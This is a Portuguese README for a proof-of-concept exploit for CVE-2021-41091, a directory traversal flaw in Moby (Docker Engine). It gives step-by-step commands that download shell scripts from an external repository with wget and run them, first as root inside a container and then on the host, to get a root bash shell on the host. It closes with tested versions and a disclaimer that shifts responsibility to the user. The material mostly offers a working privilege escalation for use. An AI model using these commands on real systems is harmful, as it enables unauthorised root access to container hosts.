
Exploit de prova de conceito para CVE-2021-41091: travessia de diretório no Moby (Docker Engine) permitindo que usuários não privilegiados executem binários SUID do container no host. Inclui scripts PoC para Ubuntu 20.04.
Um bug no Moby (Docker Engine) permite a usuários sem privilégios atravessar diretórios e executar programas diretamente do docker na máquina principal, se no docker existir um programa suid, o usuário poderá executá-lo como suid na máquina principal
No terminal do contêiner baixamos o arquivo docker.sh, em seguida executamos como usuário root:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
Agora na máquina principal baixamos o arquivo principal.sh e executamos:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
Executamos o comando que nos dará o arquivo e seremos capazes de executar o /bin/bash como root
Estes scripts foram testados no Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) com a versão do Moby 20.10.5+dfsg1
O USO DESTE REPOSITÓRIO É RESPONSABILIDADE DE QUEM O UTILIZA E NÃO DO AUTOR